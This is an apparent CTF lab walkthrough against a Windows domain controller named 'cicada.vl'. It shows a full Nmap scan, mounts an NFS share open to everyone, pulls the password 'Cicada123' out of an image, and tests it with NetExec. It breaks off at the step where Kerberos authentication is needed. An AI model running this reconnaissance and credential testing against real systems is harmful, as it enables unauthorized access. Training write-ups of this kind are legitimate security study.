Nmap Scan
First, I performed a comprehensive Nmap scan to identify open ports and running services on the target machine:
└─$ nmap -sV -vv -p- -A --min-rate 3000 -oN vulnCicada_tcp.txt 10.129.132.149Nmap scan report for 10.129.132.149 (10.129.132.149)Host is up, received echo-reply ttl 127 (0.051s latency).Scanned at 2025-09-06 19:28:11 +01 for 180sNot shown: 65512 filtered tcp ports (no-response)PORT STATE SERVICE REASON VERSION53/tcp open domain syn-ack ttl 127 Simple DNS Plus80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0| http-methods:| Supported Methods: OPTIONS TRACE GET HEAD POST|_ Potentially risky methods: TRACE|_http-title: IIS Windows Server88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-06 18:29:04Z)111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/tcp6 rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 2,3,4 111/udp6 rpcbind| 100003 2,3 2049/udp nfs| 100003 2,3 2049/udp6 nfs| 100003 2,3,4 2049/tcp nfs| 100003 2,3,4 2049/tcp6 nfs| 100005 1,2,3 2049/tcp mountd| 100005 1,2,3 2049/tcp6 mountd| 100005 1,2,3 2049/udp mountd| 100005 1,2,3 2049/udp6 mountd| 100021 1,2,3,4 2049/tcp nlockmgr| 100021 1,2,3,4 2049/tcp6 nlockmgr| 100021 1,2,3,4 2049/udp nlockmgr| 100021 1,2,3,4 2049/udp6 nlockmgr| 100024 1 2049/tcp status| 100024 1 2049/tcp6 status| 100024 1 2049/udp status|_ 100024 1 2049/udp6 status135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2025-09-06T18:16:42| Not valid after: 2026-09-06T18:16:42| MD5: bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712| -----BEGIN CERTIFICATE-----| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==|_-----END CERTIFICATE-----|_ssl-date: TLS randomness does not represent time445/tcp open microsoft-ds? syn-ack ttl 127464/tcp open kpasswd5? syn-ack ttl 127593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2025-09-06T18:16:42| Not valid after: 2026-09-06T18:16:42| MD5: bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712| -----BEGIN CERTIFICATE-----| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==|_-----END CERTIFICATE-----2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2025-09-06T18:16:42| Not valid after: 2026-09-06T18:16:42| MD5: bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712| -----BEGIN CERTIFICATE-----| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==|_-----END CERTIFICATE-----|_ssl-date: TLS randomness does not represent time3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl| Issuer: commonName=cicada-DC-JPQ225-CA/domainComponent=cicada| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2025-09-06T18:16:42| Not valid after: 2026-09-06T18:16:42| MD5: bf1f:ac81:fa7b:442e:e647:11bc:c4e5:402a| SHA-1: 48f0:b214:2fb7:0f23:cdb1:612e:cd14:535e:7bb8:4712| -----BEGIN CERTIFICATE-----| MIIGQjCCBSqgAwIBAgITdAAAAFfXs2UyuT/hcAAcAAAAVzANBgkqhkiG9w0BAQsF| ADBKMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZjaWNhZGEx| HDAaBgNVBAMTE2NpY2FkYS1EQy1KUFEyMjUtQ0EwHhcNMjUwOTA2MTgxNjQyWhcN| MjYwOTA2MTgxNjQyWjAeMRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMIIB| IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA19ty7oM3TNC0ehF2+bEt8Uwv| JMx76rw1n85QYczi25aWnUJ2+G2yThM2AQYXMC1kMMum8LAoc+WDBSrp+6pW3vVA| MEbnHDZBrsN1CW0WCyv2bPfMquIxOLUr9yZEp9ziInuKnmgn+aIcPRMG8kVbk7Er| A+OkLuG1JD3F6f4/qSPL10ZfQQH9+SjmJdxh5BWvbEnDBX+1iF7BADmPEmdXK1cV| Zxe2x+OGXhd5bBZOugRpc5/riblqi5+6Xj/hUsSNwCDJUDMGnCNUbw9sgWr3vJa1| bBTSM7NdJq/GkdhhuTQrnTHDk5CoAxAfNmiSJicjvVonqDXufDcATEwbIOgR0QID| AQABo4IDSzCCA0cwLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBDAG8AbgB0| AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAOBgNV| HQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgICAIAwDgYI| KoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJYIZIAWUD| BAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBMBgkrBgEEAYI3| GQIEPzA9oDsGCisGAQQBgjcZAgGgLQQrUy0xLTUtMjEtNjg3NzAzMzkzLTE0NDc3| OTU4ODItNjYwOTgyNDctMTAwMDA/BgNVHREEODA2oB8GCSsGAQQBgjcZAaASBBBJ| dTpUavdLT4B84ikMU0MFghNEQy1KUFEyMjUuY2ljYWRhLnZsMB0GA1UdDgQWBBT3| Mja2q44Gjn47J8gYGNsdE+lmPDAfBgNVHSMEGDAWgBQdBflF4nQ7T40THWEd2S3w| WfbrQTCB1QYDVR0fBIHNMIHKMIHHoIHEoIHBhoG+bGRhcDovLy9DTj1jaWNhZGEt| REMtSlBRMjI1LUNBKDI4KSxDTj1EQy1KUFEyMjUsQ049Q0RQLENOPVB1YmxpYyUy| MEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9| Y2ljYWRhLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl| Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwwYIKwYBBQUHAQEEgbYwgbMw| gbAGCCsGAQUFBzAChoGjbGRhcDovLy9DTj1jaWNhZGEtREMtSlBRMjI1LUNBLENO| PUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1D| b25maWd1cmF0aW9uLERDPWNpY2FkYSxEQz12bD9jQUNlcnRpZmljYXRlP2Jhc2U/| b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF| AAOCAQEAFA9MrBFpy3kQsVTyHs3r85gphK6OUeuWl20FW6khDvfJvDnJGHIsOM5e| mvQ8+T8xGOMFhjEIt2Su8+RbJRzQmdRL9ImQflwErB/Vlss6amE4usJJiAJ3O5Z0| 1wCX3ouSr3zDAvzyUAPYTC8UdwaxuHMzlYFeoSE6n8rSqN4qYcyMI+uD3sjoQWdY| Csg0IxE3hUdCEWmL8l/7S1/8jejKw4HTWcdt+S1x+OvtO7dxWQulEY+xkuonImqR| L2qB1815e9XnwmXo6ufA77A3m2EIyBDTjyIQelEakj5tg3KXJPxpuUgdZIyv2Hgi| XGvs9UGoPQMmT63GzeHPo8VRJ9x0zg==|_-----END CERTIFICATE-----|_ssl-date: TLS randomness does not represent time3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl| Issuer: commonName=DC-JPQ225.cicada.vl| Public Key type: rsa| Public Key bits: 2048| Signature Algorithm: sha256WithRSAEncryption| Not valid before: 2025-04-09T08:36:14| Not valid after: 2025-10-09T08:36:14| MD5: f13b:3481:00fe:742d:b289:2a44:9aea:763c| SHA-1: ac61:95c8:b55d:0e99:a594:56f4:48c4:e7d1:6999:96b3| -----BEGIN CERTIFICATE-----| MIIC6jCCAdKgAwIBAgIQNCY/0xacrp1Cgph0o7/EVDANBgkqhkiG9w0BAQsFADAe| MRwwGgYDVQQDExNEQy1KUFEyMjUuY2ljYWRhLnZsMB4XDTI1MDQwOTA4MzYxNFoX| DTI1MTAwOTA4MzYxNFowHjEcMBoGA1UEAxMTREMtSlBRMjI1LmNpY2FkYS52bDCC| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMD1KYuFyCTatOninwC0jOUf| XKXX5gBEBj4kxS+d9yP56mMrY/KrEA+NScVoPiX3+1nHwxAaTMt5w87MdzQMKuuD| iVuRkGfXjLAyZr5UPksxd7oBqg0RfJItYKygORbvrSJBiyjSZEStPdo4iRF1uT5+| 7BO1aOotkssJuomFKN5xXcqs2RYw2HldZZEy5jWpn6404R5dKNIMXGPl1sklA7zZ| RASYBXC9hMz8hvcMdeke8NDYWXg/e2GLY83gbm3M6QZ//nMILaLVCUWaGltqv69f| LX08oXQ6DFqbSpHfQwjk+CK3XRQThz60SBY264m+DnovRpFPmxA4i8oe0T1/QAkC| AwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqG| SIb3DQEBCwUAA4IBAQCna6lg9KzBWoGwmyEv5l1v9E/nEdDH4fJo6FYsTafgYZiA| FRxJqz5g/swGjnCCVUfl6Rjblm2jOjrlLk7JNLyeZ5lYObOwEljgm2u4YVvLXb99| 9Q+ThsxgdEOv4BmD0KaWrBVq0Y38gx2Xe+CMeCpDLhsjAl0lIYRFAHZ2NxLUZd7j| K0+G0Q60mwUV512n7VtzL7B04lpo10rXNGPAyfDw6m14w64T0H67V69bDr1LO876| 3VFOADcaMBF4RE3UoPrXimKw/XA9dE/c9y4CdWAcN1gUFwkhoW3NYKMWiHgSOZ41| oMl1GGfQyFXyXXLfM+F3t/Kzb/oTJKZVHMUGA/cZ|_-----END CERTIFICATE-----|_ssl-date: 2025-09-06T18:30:43+00:00; +3s from scanner time.5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC60737/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC61070/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC61153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC62775/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016OS fingerprint not ideal because: Missing a closed TCP port so results incompleteAggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)No exact OS matches for host (test conditions non-ideal).TCP/IP fingerprint:SCAN(V=7.95%E=4%D=9/6%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68BC7DEF%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=A)SEQ(SP=101%GCD=1%ISR=10E%TI=I%II=I%SS=S%TS=A)OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)U1(R=N)IE(R=Y%DFI=N%TG=80%CD=Z)
Uptime guess: 0.005 days (since Sat Sep 6 19:24:00 2025)Network Distance: 2 hopsTCP Sequence Prediction: Difficulty=257 (Good luck!)IP ID Sequence Generation: IncrementalService Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:| p2p-conficker:| Checking for Conficker.C or higher...| Check 1 (port 3811/tcp): CLEAN (Timeout)| Check 2 (port 50031/tcp): CLEAN (Timeout)| Check 3 (port 7565/udp): CLEAN (Timeout)| Check 4 (port 58555/udp): CLEAN (Timeout)|_ 0/4 checks are positive: Host is CLEAN or ports are blocked|_clock-skew: mean: 2s, deviation: 0s, median: 1s| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required| smb2-time:| date: 2025-09-06T18:30:04|_ start_date: N/A
TRACEROUTE (using port 135/tcp)HOP RTT ADDRESS1 51.07 ms 10.10.14.1 (10.10.14.1)2 52.29 ms 10.129.132.149 (10.129.132.149)
Read data files from: /usr/share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Sat Sep 6 19:31:11 2025 -- 1 IP address (1 host up) scanned in 180.65 secondsAnalysis of Scan Results
The Nmap scan revealed this is a Windows Domain Controller with several critical services exposed. The most interesting findings include:
- Port 2049 (NFS): Network File System - often misconfigured in enterprise environments
- Ports 389/636 (LDAP/LDAPS): Active Directory services
- Port 88 (Kerberos): Domain authentication
- Port 445 (SMB): File sharing protocol
The SSL certificate revealed the domain name cicada.vl and hostname DC-JPQ225.cicada.vl.
Updating Hosts File
To properly interact with the Active Directory environment, I added the domain information to my local hosts file:
└─$ echo -e "10.129.234.48\tDC-JPQ225.cicada.vl\tcicada.vl\tDC-JPQ225" | sudo tee -a /etc/hosts10.129.234.48 DC-JPQ225.cicada.vl cicada.vl DC-JPQ225This ensures proper name resolution for Kerberos authentication and other domain-specific operations.
NFS Enumeration
Since I discovered NFS running on port 2049, I decided to enumerate available exports. NFS is often misconfigured and can expose sensitive data:
└─$ showmount -e 10.129.234.48Export list for 10.129.234.48:/profiles (everyone)The /profiles directory was exported with “everyone” permissions which is a significant security misconfiguration.
Mounting the NFS Share
Since the NFS share was accessible to everyone, I mounted it locally to examine its contents:
└─$ sudo mkdir /mnt/profiles && sudo mount -t nfs 10.129.234.48:/profiles /mnt/profiles -o nolock└─$ ls /mnt/profilesAdministrator Daniel.Marshall Debra.Wright Jane.Carter Jordan.Francis Joyce.Andrews Katie.Ward Megan.Simpson Richard.Gibbons Rosie.Powell Shirley.WestI found multiple user profiles, including the high-privilege Administrator account and several standard user accounts.
Enumerating User Profiles
While exploring the mounted folder, I discovered that the Administrator and Rosie.Powell folders contained image files each:

Discovering Credentials
I opened both images and found that the image named marketing.png in Rosie.Powell’s folder contained a note with “Cicada123” - which looked like a potential password!

Credential Validation
I decided to test if “Cicada123” could be the password for Rosie.Powell using NetExec:
nxc smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123
The results showed that NTLM was disabled on this domain controller. This is actually a security best practice, but it meant I needed to use Kerberos authentication instead by adding the -k flag:
